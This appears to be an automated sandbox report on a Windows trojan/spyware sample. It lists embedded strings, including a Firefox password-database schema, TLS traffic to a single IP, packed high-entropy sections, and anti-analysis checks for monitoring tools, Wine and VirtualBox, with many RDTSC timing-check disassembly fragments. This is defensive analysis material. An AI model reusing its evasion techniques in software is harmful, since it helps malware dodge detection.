Source: XM6cn2uNux.exe, 00000000.00000003.2778602554.0000000005A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
Source: XM6cn2uNux.exe, 00000000.00000003.2778602554.0000000005A3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49860 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50006 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50007 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50008 version: TLS 1.2

                System Summary

                Source: XM6cn2uNux.exe | Static PE information: section name:
                Source: XM6cn2uNux.exe | Static PE information: section name: .idata
                Source: XM6cn2uNux.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_01214C5D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_012330DD
                Source: XM6cn2uNux.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: XM6cn2uNux.exe | Static PE information: Section: ZLIB complexity 0.9995659722222222
                Source: XM6cn2uNux.exe | Static PE information: Section: nfuikskw ZLIB complexity 0.9946649186324276
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: XM6cn2uNux.exe, 00000000.00000003.2246588416.0000000005A38000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2341646395.0000000005A38000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2247170665.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: XM6cn2uNux.exe | Virustotal: Detection: 53%
                Source: XM6cn2uNux.exe | ReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | File read: C:\Users\user\Desktop\XM6cn2uNux.exe
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Section loaded: version.dll
                Source: XM6cn2uNux.exe | Static file information: File size 1887232 > 1048576
                Source: XM6cn2uNux.exe | Static PE information: Raw size of nfuikskw is bigger than: 0x100000 < 0x1a2a00

                Data Obfuscation

                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Unpacked PE file: 0.2.XM6cn2uNux.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nfuikskw:EW;uavdauvr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nfuikskw:EW;uavdauvr:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: XM6cn2uNux.exe | Static PE information: real checksum: 0x1d861c should be: 0x1d93e2
                Source: XM6cn2uNux.exe | Static PE information: section name:
                Source: XM6cn2uNux.exe | Static PE information: section name: .idata
                Source: XM6cn2uNux.exe | Static PE information: section name:
                Source: XM6cn2uNux.exe | Static PE information: section name: nfuikskw
                Source: XM6cn2uNux.exe | Static PE information: section name: uavdauvr
                Source: XM6cn2uNux.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_05A148B2 push ss; retf 0_3_05A148B3
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_05A14F34 push ss; ret 0_3_05A14F4D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_0120CB60 pushad ; retf 0_3_0120CB61
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_0120CB64 pushad ; retf 0_3_0120CB65
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_0120CB68 push 680120CBh; retf 0_3_0120CB6D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_0120CF76 pushfd ; iretd 0_3_0120CF99
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_0120CB50 push eax; retf 0_3_0120CB51
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_01218750 push ds; retf 0_3_01218752
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_0120CB54 push eax; retf 0_3_0120CB55
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Code function: 0_3_012150EC push esi; retf 0_3_012150EF
                Source: XM6cn2uNux.exe | Static PE information: section name: entropy: 7.9847234008770345
                Source: XM6cn2uNux.exe | Static PE information: section name: nfuikskw entropy: 7.953324475907689

                Boot Survival

                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 429249 second address: 428B2D instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57C52C318h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f cld 0x00000010 push dword ptr [ebp+122D0465h] 0x00000016 cld 0x00000017 jmp 00007FC57C52C326h 0x0000001c call dword ptr [ebp+122D2588h] 0x00000022 pushad 0x00000023 cmc 0x00000024 xor eax, eax 0x00000026 jnp 00007FC57C52C31Ch 0x0000002c mov dword ptr [ebp+122D1A80h], edx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 mov dword ptr [ebp+122D200Ch], ecx 0x0000003c mov dword ptr [ebp+122D3A32h], eax 0x00000042 cmc 0x00000043 mov esi, 0000003Ch 0x00000048 pushad 0x00000049 jmp 00007FC57C52C320h 0x0000004e add bx, E697h 0x00000053 popad 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 js 00007FC57C52C32Dh 0x0000005e jmp 00007FC57C52C327h 0x00000063 lodsw 0x00000065 jmp 00007FC57C52C322h 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e mov dword ptr [ebp+122D1A80h], eax 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 pushad 0x00000079 mov eax, dword ptr [ebp+122D379Eh] 0x0000007f adc dx, D4CBh 0x00000084 popad 0x00000085 nop 0x00000086 jmp 00007FC57C52C31Bh 0x0000008b push eax 0x0000008c je 00007FC57C52C322h 0x00000092 jnp 00007FC57C52C31Ch 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59B9F2 second address: 59BA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FC57CD4ED07h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e jmp 00007FC57CD4ED05h 0x00000013 popad 0x00000014 push ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59BA2C second address: 59BA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59BA32 second address: 59BA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59BA38 second address: 59BA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC57C52C316h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FC57C52C316h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 58D72A second address: 58D72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 58D72F second address: 58D761 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007FC57C52C324h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC57C52C31Ch 0x00000014 je 00007FC57C52C318h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 58D761 second address: 58D768 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59A97B second address: 59A9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jnl 00007FC57C52C348h 0x0000000c jnp 00007FC57C52C322h 0x00000012 pushad 0x00000013 jmp 00007FC57C52C326h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59ACB3 second address: 59ACBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59ACBA second address: 59ACE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C323h 0x00000009 ja 00007FC57C52C316h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jg 00007FC57C52C316h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59ACE7 second address: 59ACEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59ACEC second address: 59ACF1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59AE2A second address: 59AE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59AF79 second address: 59AF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C320h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59AF8D second address: 59AF9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFAh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59AF9D second address: 59AFA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC57C52C316h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59AFA9 second address: 59AFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59AFAD second address: 59AFCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FC57C52C326h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59B2E2 second address: 59B2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59F1A0 second address: 59F255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d xor dword ptr [esp], 53A6AB00h 0x00000014 push ebx 0x00000015 jp 00007FC57C52C317h 0x0000001b stc 0x0000001c pop edi 0x0000001d push 00000003h 0x0000001f mov dword ptr [ebp+122D3477h], ecx 0x00000025 jmp 00007FC57C52C324h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007FC57C52C318h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D1C22h], esi 0x0000004c push 00000003h 0x0000004e call 00007FC57C52C319h 0x00000053 jmp 00007FC57C52C31Fh 0x00000058 push eax 0x00000059 jmp 00007FC57C52C323h 0x0000005e mov eax, dword ptr [esp+04h] 0x00000062 jmp 00007FC57C52C31Dh 0x00000067 mov eax, dword ptr [eax] 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c jmp 00007FC57C52C31Bh 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59F255 second address: 59F25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59F25A second address: 59F264 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC57C52C31Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59F33E second address: 59F434 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC57CD4ECF8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov esi, dword ptr [ebp+122D38E6h] 0x00000013 or esi, dword ptr [ebp+122D332Dh] 0x00000019 push 00000000h 0x0000001b mov ecx, dword ptr [ebp+122D2794h] 0x00000021 push 4BF2264Eh 0x00000026 jno 00007FC57CD4ED15h 0x0000002c xor dword ptr [esp], 4BF226CEh 0x00000033 pushad 0x00000034 sub cx, C788h 0x00000039 jmp 00007FC57CD4ED06h 0x0000003e popad 0x0000003f clc 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FC57CD4ECF8h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push 00000000h 0x0000005e mov edi, ebx 0x00000060 push 00000003h 0x00000062 cmc 0x00000063 push B1ABA0B9h 0x00000068 jmp 00007FC57CD4ED06h 0x0000006d xor dword ptr [esp], 71ABA0B9h 0x00000074 jmp 00007FC57CD4ED03h 0x00000079 lea ebx, dword ptr [ebp+12449FCCh] 0x0000007f jmp 00007FC57CD4ED09h 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59F434 second address: 59F439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59F439 second address: 59F43E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59F519 second address: 59F55B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4C3DD538h 0x00000010 mov dx, si 0x00000013 cld 0x00000014 lea ebx, dword ptr [ebp+12449FD7h] 0x0000001a pushad 0x0000001b or di, 370Fh 0x00000020 popad 0x00000021 mov edi, dword ptr [ebp+122D18B6h] 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b jp 00007FC57C52C316h 0x00000031 pop edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 59F55B second address: 59F561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5B1437 second address: 5B143D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5C1089 second address: 5C1093 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57CD4ECF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5943A9 second address: 5943D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC57C52C327h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5BF469 second address: 5BF46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5BF46F second address: 5BF489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C325h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5BF5D0 second address: 5BF5D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5BF5D9 second address: 5BF5E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC57C52C316h 0x00000008 jo 00007FC57C52C316h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5BF745 second address: 5BF74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5B2C0C second address: 5B2C16 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC57C52C316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5C01DD second address: 5C01F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC57CD4ECF6h 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jo 00007FC57CD4ECFCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5C01F2 second address: 5C0200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007FC57C52C316h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0200 second address: 5C0210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC57CD4ECF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0210 second address: 5C0216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0216 second address: 5C0233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED09h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0A7D second address: 5C0A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC57C52C322h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0A98 second address: 5C0A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
